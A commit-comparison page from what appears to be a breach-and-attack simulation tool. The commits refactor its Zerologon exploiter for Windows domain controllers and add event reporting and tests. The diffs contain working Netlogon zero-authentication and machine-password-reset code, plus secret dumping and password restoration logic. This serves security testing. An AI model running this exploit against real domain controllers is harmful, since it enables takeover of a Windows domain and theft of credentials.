Compare commits

...

25 Commits

Author SHA1 Message Date
Kekoa Kaaikala 2e0ef1865b UT: Add dummy timestamp to zerologon tests 2022-10-07 20:34:35 +00:00
Kekoa Kaaikala 88d2bf7140 Agent: Add timestamps to publish calls 2022-10-07 20:27:14 +00:00
Kekoa Kaaikala 8eb3c94a94 Agent: Report failed login attempts 2022-10-07 20:14:04 +00:00
Kekoa Kaaikala 74088c8143 Agent: Rename is_exploitable to authenticate 2022-10-07 19:50:21 +00:00
Kekoa Kaaikala 2281d52acc Agent: Move is_exploitable to zerologon.py 2022-10-07 19:46:54 +00:00
Kekoa Kaaikala 374d3d8a50 Agent: Move connect_to_dc to vuln_assessment.py 2022-10-07 19:38:18 +00:00
Ilija Lazoroski 86edb63cb4 Agent: Fix PasswordRestorationEvent tags in Zerologon 2022-10-07 17:50:16 +02:00
Ilija Lazoroski 6adb356e81 Agent: Move Zerologon tag to the implementation
It is not used anywhere else.
2022-10-07 17:50:16 +02:00
Shreya Malviya 559a8c9f66 UT: Improve tests for zerologon 2022-10-07 17:50:16 +02:00
Shreya Malviya 050a84d890 Agent: Move password restoration event publishing in zerologon 2022-10-07 17:50:16 +02:00
Ilija Lazoroski f05d5be32f UT: Add check if we publish events in Zerologon 2022-10-07 17:50:16 +02:00
Shreya Malviya a5e31ee998 Agent: Publish PasswordRestorationEvent in zerologon 2022-10-07 17:50:16 +02:00
Shreya Malviya a50554f115 Agent: Add `target` in CredentialsStolenEvent in zerologon 2022-10-07 17:50:16 +02:00
Shreya Malviya 16ed8d6233 Agent: Remove `time=time()` in calls to `_publish_exploitation_event()` in zerologon since that's the default argument anyway 2022-10-07 17:50:16 +02:00
Shreya Malviya ad47e3be2f UT: Remove unused variables from test_zerologon.py 2022-10-07 17:50:16 +02:00
Shreya Malviya fe178841d0 Agent: Add typehint in zerologon that mypy complained about 2022-10-07 17:50:16 +02:00
Shreya Malviya 0e2f80ded6 Agent: Fix calls to _publish_exploitation_event in zerologon 2022-10-07 17:50:16 +02:00
Shreya Malviya 1cf017c2ac Agent: Remove publishing exploitation attempts in zerologon's vuln assessment 2022-10-07 17:50:16 +02:00
Shreya Malviya 3b60c760e4 Agent: Catch Exception instead of BaseException in zerologon 2022-10-07 17:50:16 +02:00
ilija-lazoroski 237b0ae394 Common: Add PasswordRestorationEvent 2022-10-07 17:50:16 +02:00
Ilija Lazoroski 1db5e9adc5 UT: Add mock_agent_event_queue in zerologon tests 2022-10-07 17:50:16 +02:00
Ilija Lazoroski 9a261296e4 UT: Fix zerologon unit tests 2022-10-07 17:50:16 +02:00
Ilija Lazoroski d3a2fa8a4c Agent: Add zerologon exploiter tag to zerologon_utils 2022-10-07 17:50:16 +02:00
Ilija Lazoroski ef581ff912 Agent: Ignore union-attr mypy error in Zerologon 2022-10-07 17:50:16 +02:00
Ilija Lazoroski e9254aedbd Agent: Publish exploitation events from Zerologon 2022-10-07 17:50:16 +02:00
7 changed files with 287 additions and 110 deletions

View File

@ -4,3 +4,4 @@ from .ping_scan_event import PingScanEvent
from .tcp_scan_event import TCPScanEvent from .tcp_scan_event import TCPScanEvent
from .exploitation_event import ExploitationEvent from .exploitation_event import ExploitationEvent
from .propagation_event import PropagationEvent from .propagation_event import PropagationEvent
from .password_restoration_event import PasswordRestorationEvent

View File

@ -0,0 +1,18 @@
from ipaddress import IPv4Address
from . import AbstractAgentEvent
class PasswordRestorationEvent(AbstractAgentEvent):
"""
An event that occurs when a password has been restored on the target
system
Attributes:
:param target: The IP of the target system on which the
restoration was performed
:param success: If the password restoration was successful
"""
target: IPv4Address
success: bool

View File

@ -9,21 +9,25 @@ import os
import re import re
import tempfile import tempfile
from binascii import unhexlify from binascii import unhexlify
from time import time
from typing import Dict, List, Optional, Sequence, Tuple from typing import Dict, List, Optional, Sequence, Tuple
import impacket import impacket
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dtypes import NULL
from common.agent_events import CredentialsStolenEvent from common.agent_events import CredentialsStolenEvent, PasswordRestorationEvent
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.credentials import Credentials, LMHash, NTHash, Username from common.credentials import Credentials, LMHash, NTHash, Username
from common.tags import T1003_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG from common.tags import (
T1003_ATTACK_TECHNIQUE_TAG,
T1098_ATTACK_TECHNIQUE_TAG,
T1210_ATTACK_TECHNIQUE_TAG,
)
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.wmi_tools import WmiTools from infection_monkey.exploit.tools.wmi_tools import WmiTools
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable from infection_monkey.exploit.zerologon_utils.vuln_assessment import connect_to_dc, get_dc_details
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
from infection_monkey.i_puppet import ExploiterResultData from infection_monkey.i_puppet import ExploiterResultData
from infection_monkey.utils.capture_output import StdoutCapture from infection_monkey.utils.capture_output import StdoutCapture
@ -34,7 +38,7 @@ logger = logging.getLogger(__name__)
ZEROLOGON_EXPLOITER_TAG = "zerologon-exploiter" ZEROLOGON_EXPLOITER_TAG = "zerologon-exploiter"
ZEROLOGON_EVENT_TAGS = frozenset( CREDENTIALS_STOLEN_EVENT_TAGS = frozenset(
{ {
ZEROLOGON_EXPLOITER_TAG, ZEROLOGON_EXPLOITER_TAG,
T1003_ATTACK_TECHNIQUE_TAG, T1003_ATTACK_TECHNIQUE_TAG,
@ -42,9 +46,19 @@ ZEROLOGON_EVENT_TAGS = frozenset(
} }
) )
PASSWORD_RESTORATION_EVENT_TAGS = frozenset({ZEROLOGON_EXPLOITER_TAG})
class ZerologonExploiter(HostExploiter): class ZerologonExploiter(HostExploiter):
_EXPLOITED_SERVICE = "Netlogon" _EXPLOITED_SERVICE = "Netlogon"
_EXPLOITER_TAGS = (
ZEROLOGON_EXPLOITER_TAG,
T1003_ATTACK_TECHNIQUE_TAG,
T1098_ATTACK_TECHNIQUE_TAG,
T1210_ATTACK_TECHNIQUE_TAG,
)
_PROPAGATION_TAGS: Tuple[str, ...] = tuple()
MAX_ATTEMPTS = 2000 # For 2000, expected average number of attempts needed: 256. MAX_ATTEMPTS = 2000 # For 2000, expected average number of attempts needed: 256.
ERROR_CODE_ACCESS_DENIED = 0xC0000022 ERROR_CODE_ACCESS_DENIED = 0xC0000022
@ -61,8 +75,8 @@ class ZerologonExploiter(HostExploiter):
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
self.dc_ip, self.dc_name, self.dc_handle = get_dc_details(self.host) self.dc_ip, self.dc_name, self.dc_handle = get_dc_details(self.host)
can_exploit, rpc_con = is_exploitable(self) authenticated, rpc_con = self.authenticate()
if can_exploit: if authenticated:
logger.info("Target vulnerable, changing account password to empty string.") logger.info("Target vulnerable, changing account password to empty string.")
if self._is_interrupted(): if self._is_interrupted():
@ -73,7 +87,7 @@ class ZerologonExploiter(HostExploiter):
logger.debug("Attempting exploit.") logger.debug("Attempting exploit.")
_exploited = self._send_exploit_rpc_login_requests(rpc_con) _exploited = self._send_exploit_rpc_login_requests(rpc_con)
rpc_con.disconnect() rpc_con.disconnect() # type: ignore[union-attr]
else: else:
logger.info( logger.info(
@ -99,39 +113,107 @@ class ZerologonExploiter(HostExploiter):
return self.exploit_result return self.exploit_result
@staticmethod def authenticate(self) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
def connect_to_dc(dc_ip) -> object: """
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp") Attempt to authenticate with the domain controller
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT) :return:
rpc_con = rpc_transport.get_dce_rpc() - Whether or not authentication was successful
rpc_con.connect() - An RPC connection on success, otherwise None
rpc_con.bind(nrpc.MSRPC_UUID_NRPC) """
return rpc_con # Connect to the DC's Netlogon service.
try:
rpc_con = connect_to_dc(self.dc_ip)
except Exception as err:
error_message = f"Exception occurred while connecting to DC: {err}"
logger.info(error_message)
return False, None
# Try authenticating.
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
timestamp = time()
try:
rpc_con_auth_result = self._try_zero_authenticate(rpc_con)
if rpc_con_auth_result is not None:
return True, rpc_con_auth_result
error_message = "Failed to authenticate with domain controller"
self._publish_exploitation_event(timestamp, False, error_message=error_message)
except Exception as err:
error_message = f"Error occured while authenticating to {self.host}: {err}"
logger.info(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return False, None
return False, None
def _try_zero_authenticate(self, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5:
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
flags = 0x212FFFFF
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
rpc_con,
self.dc_handle + "\x00",
self.dc_name + "\x00",
plaintext,
)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con,
self.dc_handle + "\x00",
self.dc_name + "$\x00",
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
self.dc_name + "\x00",
ciphertext,
flags,
)
assert server_auth["ErrorCode"] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
if (
ex.get_error_code() == 0xC0000022
): # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
raise Exception(f"Unexpected error code: {ex.get_error_code()}.")
except BaseException as ex:
raise Exception(f"Unexpected error: {ex}.")
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool: def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt): for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
exploit_attempt_result = self.try_exploit_attempt(rpc_con) exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result) is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
if is_exploited: if is_exploited:
return True return True
return False return False
def try_exploit_attempt(self, rpc_con) -> Optional[object]: def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
error_message = ""
timestamp = time()
try: try:
exploit_attempt_result = self.attempt_exploit(rpc_con) exploit_attempt_result = self.attempt_exploit(rpc_con)
return exploit_attempt_result return exploit_attempt_result, timestamp
except nrpc.DCERPCSessionError as e: except nrpc.DCERPCSessionError as err:
# Failure should be due to a STATUS_ACCESS_DENIED error. # Failure should be due to a STATUS_ACCESS_DENIED error.
# Otherwise, the attack is probably not working. # Otherwise, the attack is probably not working.
if e.get_error_code() != self.ERROR_CODE_ACCESS_DENIED: if err.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
logger.info(f"Unexpected error code from DC: {e.get_error_code()}") error_message = f"Unexpected error code from DC: {err.get_error_code()}"
except BaseException as e: logger.info(error_message)
logger.info(f"Unexpected error: {e}") except Exception as err:
error_message = f"Unexpected error: {err}"
logger.info(error_message)
return None self._publish_exploitation_event(timestamp, False, error_message=error_message)
return None, timestamp
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object: def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
request = nrpc.NetrServerPasswordSet2() request = nrpc.NetrServerPasswordSet2()
@ -152,19 +234,24 @@ class ZerologonExploiter(HostExploiter):
request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
request["Authenticator"] = authenticator request["Authenticator"] = authenticator
def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool: def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
if exploit_attempt_result: if exploit_attempt_result:
if exploit_attempt_result["ErrorCode"] == 0: if exploit_attempt_result["ErrorCode"] == 0:
self.report_login_attempt(result=True, user=self.dc_name) self.report_login_attempt(result=True, user=self.dc_name)
_exploited = True _exploited = True
logger.info("Exploit complete!") logger.info("Exploit complete!")
self._publish_exploitation_event(timestamp, True)
else: else:
self.report_login_attempt(result=False, user=self.dc_name) self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False _exploited = False
logger.info( error_message = (
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something " f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
f"went wrong." "Something went wrong."
) )
logger.info(error_message)
self._publish_exploitation_event(timestamp, False, error_message=error_message)
return _exploited return _exploited
return False return False
@ -202,7 +289,7 @@ class ZerologonExploiter(HostExploiter):
# Connect to the DC's Netlogon service. # Connect to the DC's Netlogon service.
try: try:
rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip) rpc_con = connect_to_dc(self.dc_ip)
except Exception as e: except Exception as e:
logger.info(f"Exception occurred while connecting to DC: {str(e)}") logger.info(f"Exception occurred while connecting to DC: {str(e)}")
return False return False
@ -310,7 +397,8 @@ class ZerologonExploiter(HostExploiter):
) -> None: ) -> None:
credentials_stolen_event = CredentialsStolenEvent( credentials_stolen_event = CredentialsStolenEvent(
source=get_agent_id(), source=get_agent_id(),
tags=ZEROLOGON_EVENT_TAGS, target=self.host.ip_addr,
tags=CREDENTIALS_STOLEN_EVENT_TAGS,
stolen_credentials=extracted_credentials, stolen_credentials=extracted_credentials,
) )
self.agent_event_queue.publish(credentials_stolen_event) self.agent_event_queue.publish(credentials_stolen_event)
@ -478,11 +566,22 @@ class ZerologonExploiter(HostExploiter):
def assess_restoration_attempt_result(self, restoration_attempt_result) -> bool: def assess_restoration_attempt_result(self, restoration_attempt_result) -> bool:
if restoration_attempt_result: if restoration_attempt_result:
self._publish_password_restoration_event(success=True)
logger.debug("DC machine account password should be restored to its original value.") logger.debug("DC machine account password should be restored to its original value.")
return True return True
self._publish_password_restoration_event(success=False)
return False return False
def _publish_password_restoration_event(self, success: bool):
password_restoration_event = PasswordRestorationEvent(
source=get_agent_id(),
target=self.host.ip_addr,
tags=PASSWORD_RESTORATION_EVENT_TAGS,
success=success,
)
self.agent_event_queue.publish(password_restoration_event)
class NetrServerPasswordSet(nrpc.NDRCALL): class NetrServerPasswordSet(nrpc.NDRCALL):
opnum = 6 opnum = 6

View File

@ -1,17 +1,26 @@
import logging import logging
from typing import Optional, Tuple from typing import Tuple
import nmb.NetBIOS import nmb.NetBIOS
from impacket.dcerpc.v5 import nrpc, rpcrt from impacket.dcerpc.v5 import epm, nrpc, transport
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from common.utils.exceptions import DomainControllerNameFetchError from common.utils.exceptions import DomainControllerNameFetchError
from infection_monkey.model import VictimHost from infection_monkey.model import VictimHost
from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__) logger = logging.getLogger(__name__)
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def get_dc_details(host: VictimHost) -> Tuple[str, str, str]: def get_dc_details(host: VictimHost) -> Tuple[str, str, str]:
dc_ip = host.ip_addr dc_ip = host.ip_addr
dc_name = _get_dc_name(dc_ip=dc_ip) dc_name = _get_dc_name(dc_ip=dc_ip)
@ -34,65 +43,3 @@ def _get_dc_name(dc_ip: str) -> str:
raise DomainControllerNameFetchError( raise DomainControllerNameFetchError(
"Couldn't get domain controller's name, maybe it's on external network?" "Couldn't get domain controller's name, maybe it's on external network?"
) )
def is_exploitable(zerologon_exploiter_object) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
# Connect to the DC's Netlogon service.
try:
rpc_con = zerologon_exploiter_object.connect_to_dc(zerologon_exploiter_object.dc_ip)
except Exception as e:
logger.info(f"Exception occurred while connecting to DC: {str(e)}")
return False, None
# Try authenticating.
for _ in interruptible_iter(
range(0, zerologon_exploiter_object.MAX_ATTEMPTS), zerologon_exploiter_object.interrupt
):
try:
rpc_con_auth_result = _try_zero_authenticate(zerologon_exploiter_object, rpc_con)
if rpc_con_auth_result is not None:
return True, rpc_con_auth_result
except Exception as ex:
logger.info(ex)
return False, None
return False, None
def _try_zero_authenticate(zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5:
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
flags = 0x212FFFFF
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
rpc_con,
zerologon_exploiter_object.dc_handle + "\x00",
zerologon_exploiter_object.dc_name + "\x00",
plaintext,
)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con,
zerologon_exploiter_object.dc_handle + "\x00",
zerologon_exploiter_object.dc_name + "$\x00",
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
zerologon_exploiter_object.dc_name + "\x00",
ciphertext,
flags,
)
assert server_auth["ErrorCode"] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
if (
ex.get_error_code() == 0xC0000022
): # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
raise Exception(f"Unexpected error code: {ex.get_error_code()}.")
except BaseException as ex:
raise Exception(f"Unexpected error: {ex}.")

View File

@ -0,0 +1,76 @@
from ipaddress import IPv4Address
from uuid import UUID
import pytest
from common.agent_events import PasswordRestorationEvent
TARGET_IP_STR = "192.168.1.10"
AGENT_ID = UUID("012e7238-7b81-4108-8c7f-0787bc3f3c10")
TIMESTAMP = 1664371327.4067292
PASSWORD_RESTORATION_EVENT = PasswordRestorationEvent(
source=AGENT_ID,
timestamp=TIMESTAMP,
target=IPv4Address(TARGET_IP_STR),
success=True,
)
PASSWORD_RESTORATION_OBJECT_DICT = {
"source": AGENT_ID,
"timestamp": TIMESTAMP,
"target": IPv4Address(TARGET_IP_STR),
"success": True,
}
PASSWORD_RESTORATION_SIMPLE_DICT = {
"source": str(AGENT_ID),
"timestamp": TIMESTAMP,
"target": TARGET_IP_STR,
"success": "true",
}
@pytest.mark.parametrize(
"password_restoration_event_dict",
[PASSWORD_RESTORATION_OBJECT_DICT, PASSWORD_RESTORATION_SIMPLE_DICT],
)
def test_constructor(password_restoration_event_dict):
assert PasswordRestorationEvent(**password_restoration_event_dict) == PASSWORD_RESTORATION_EVENT
@pytest.mark.parametrize(
"key, value",
[
("target", None),
("success", "not-a-bool"),
],
)
def test_construct_invalid_field__type_error(key, value):
invalid_type_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
invalid_type_dict[key] = value
with pytest.raises(TypeError):
PasswordRestorationEvent(**invalid_type_dict)
@pytest.mark.parametrize(
"key, value",
[
("target", "not-an-ip"),
],
)
def test_construct_invalid_field__value_error(key, value):
invalid_type_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
invalid_type_dict[key] = value
with pytest.raises(ValueError):
PasswordRestorationEvent(**invalid_type_dict)
def test_construct__extra_fields_forbidden():
extra_field_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
extra_field_dict["extra_field"] = 99 # red balloons
with pytest.raises(ValueError):
PasswordRestorationEvent(**extra_field_dict)

View File

@ -1,7 +1,11 @@
from unittest.mock import MagicMock
import pytest import pytest
DOMAIN_NAME = "domain-name" from common.agent_events import ExploitationEvent, PasswordRestorationEvent
IP = "0.0.0.0" from common.event_queue import IAgentEventQueue
from infection_monkey.model import VictimHost
NETBIOS_NAME = "NetBIOS Name" NETBIOS_NAME = "NetBIOS Name"
USERS = ["Administrator", "Bob"] USERS = ["Administrator", "Bob"]
@ -11,7 +15,12 @@ NT_HASHES = ["def456", "765vut"]
@pytest.fixture @pytest.fixture
def zerologon_exploiter_object(monkeypatch): def mock_agent_event_queue():
return MagicMock(spec=IAgentEventQueue)
@pytest.fixture
def zerologon_exploiter_object(monkeypatch, mock_agent_event_queue):
from infection_monkey.exploit.zerologon import ZerologonExploiter from infection_monkey.exploit.zerologon import ZerologonExploiter
def mock_report_login_attempt(**kwargs): def mock_report_login_attempt(**kwargs):
@ -20,37 +29,57 @@ def zerologon_exploiter_object(monkeypatch):
obj = ZerologonExploiter() obj = ZerologonExploiter()
monkeypatch.setattr(obj, "dc_name", NETBIOS_NAME, raising=False) monkeypatch.setattr(obj, "dc_name", NETBIOS_NAME, raising=False)
monkeypatch.setattr(obj, "report_login_attempt", mock_report_login_attempt) monkeypatch.setattr(obj, "report_login_attempt", mock_report_login_attempt)
monkeypatch.setattr(obj, "host", VictimHost(ip_addr="1.1.1.1"))
monkeypatch.setattr(obj, "agent_event_queue", mock_agent_event_queue)
return obj return obj
@pytest.mark.slow @pytest.mark.slow
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object): def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object, mock_agent_event_queue):
dummy_exploit_attempt_result = {"ErrorCode": 0} dummy_exploit_attempt_result = {"ErrorCode": 0}
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result) assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result, 0)
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is ExploitationEvent
assert mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow @pytest.mark.slow
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object): def test_assess_exploit_attempt_result_with_error(
zerologon_exploiter_object, mock_agent_event_queue
):
dummy_exploit_attempt_result = {"ErrorCode": 1} dummy_exploit_attempt_result = {"ErrorCode": 1}
assert not zerologon_exploiter_object.assess_exploit_attempt_result( assert not zerologon_exploiter_object.assess_exploit_attempt_result(
dummy_exploit_attempt_result dummy_exploit_attempt_result, 0
) )
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is ExploitationEvent
assert not mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow @pytest.mark.slow
def test_assess_restoration_attempt_result_restored(zerologon_exploiter_object): def test_assess_restoration_attempt_result_restored(
zerologon_exploiter_object, mock_agent_event_queue
):
dummy_restoration_attempt_result = object() dummy_restoration_attempt_result = object()
assert zerologon_exploiter_object.assess_restoration_attempt_result( assert zerologon_exploiter_object.assess_restoration_attempt_result(
dummy_restoration_attempt_result dummy_restoration_attempt_result
) )
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is PasswordRestorationEvent
assert mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow @pytest.mark.slow
def test_assess_restoration_attempt_result_not_restored(zerologon_exploiter_object): def test_assess_restoration_attempt_result_not_restored(
zerologon_exploiter_object, mock_agent_event_queue
):
dummy_restoration_attempt_result = False dummy_restoration_attempt_result = False
assert not zerologon_exploiter_object.assess_restoration_attempt_result( assert not zerologon_exploiter_object.assess_restoration_attempt_result(
dummy_restoration_attempt_result dummy_restoration_attempt_result
) )
assert mock_agent_event_queue.publish.call_count == 1
assert mock_agent_event_queue.publish.call_args[0][0].__class__ is PasswordRestorationEvent
assert not mock_agent_event_queue.publish.call_args[0][0].success
@pytest.mark.slow @pytest.mark.slow

View File

@ -7,7 +7,13 @@ from common.agent_configuration.agent_sub_configurations import (
CustomPBAConfiguration, CustomPBAConfiguration,
ScanTargetConfiguration, ScanTargetConfiguration,
) )
from common.agent_events import ExploitationEvent, PingScanEvent, PropagationEvent, TCPScanEvent from common.agent_events import (
ExploitationEvent,
PasswordRestorationEvent,
PingScanEvent,
PropagationEvent,
TCPScanEvent,
)
from common.credentials import Credentials, LMHash, NTHash from common.credentials import Credentials, LMHash, NTHash
from common.tags import ( from common.tags import (
T1021_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG,
@ -336,6 +342,7 @@ T1222_ATTACK_TECHNIQUE_TAG
T1570_ATTACK_TECHNIQUE_TAG T1570_ATTACK_TECHNIQUE_TAG
HostExploiter._publish_propagation_event HostExploiter._publish_propagation_event
HostExploiter._publish_exploitation_event HostExploiter._publish_exploitation_event
PasswordRestorationEvent
# pydantic base models # pydantic base models
underscore_attrs_are_private underscore_attrs_are_private